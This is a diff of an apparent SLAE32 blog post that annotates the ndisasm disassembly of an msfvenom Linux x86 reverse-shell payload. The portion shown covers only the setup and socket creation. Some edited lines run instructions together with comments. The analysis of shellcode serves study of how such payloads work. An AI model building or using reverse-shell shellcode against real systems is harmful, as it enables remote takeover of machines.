gulyslae/gulyslae.github.io/_posts/2019-08-08-SLAE32-msfvenom.md

 as you can see in reverse.jpg , the flow is quite basic: create a socket, connect, do something. i already developed my own revshell and i think i'm familiar with the flow, so fastly to ndisasm:

     00000000  6A0A              push byte +0xa
-    00000002  5E                pop esi                  ; put 0xa in esi, will use it to loop for reconnection in circa 0x2F 00000003  31DB              xor ebx,ebx
+    00000002  5E                pop esi                  ; put 0xa in esi, will use it to loop for reconnection in 0x2F 00000003  31DB              xor ebx,ebx
-    00000005  F7E3              mul ebx                  ; multiply ebx and eax, and put result in eax+edx. result in zeroing both eax and edx, because ebx has been zeroed in 0x3
-    00000007  53                push ebx
+    00000005  F7E3              mul ebx                  ; multiply ebx and eax, and put result in eax+edx. result in ; zeroing both eax and edx, because ebx has been zeroed in 0x3 00000007  53                push ebx
     00000008  43                inc ebx
     00000009  53                push ebx
-    0000000A  6A02              push byte +0x2           ; i remember doing almost the same 4 instruction to have 0,1,2  on the stack, which is common arg for a tcp reverse shell
+    0000000A  6A02              push byte +0x2           ; i remember doing almost the same 4 instruction to have 0,1,2
-    0000000C  B066              mov al,0x66              ; and here we have socketcall socket
-    0000000E  89E1              mov ecx,esp              ; pointer to socket arg in ecx
-    00000010  CD80              int 0x80                 ; create the socket
+                                                         ; on the stack, which is common arg for a tcp reverse shell 0000000C  B066              mov al,0x66              ; and here we have socketcall socket 0000000E  89E1              mov ecx,esp              ; pointer to socket arg in ecx 00000010  CD80              int 0x80                 ; create the socket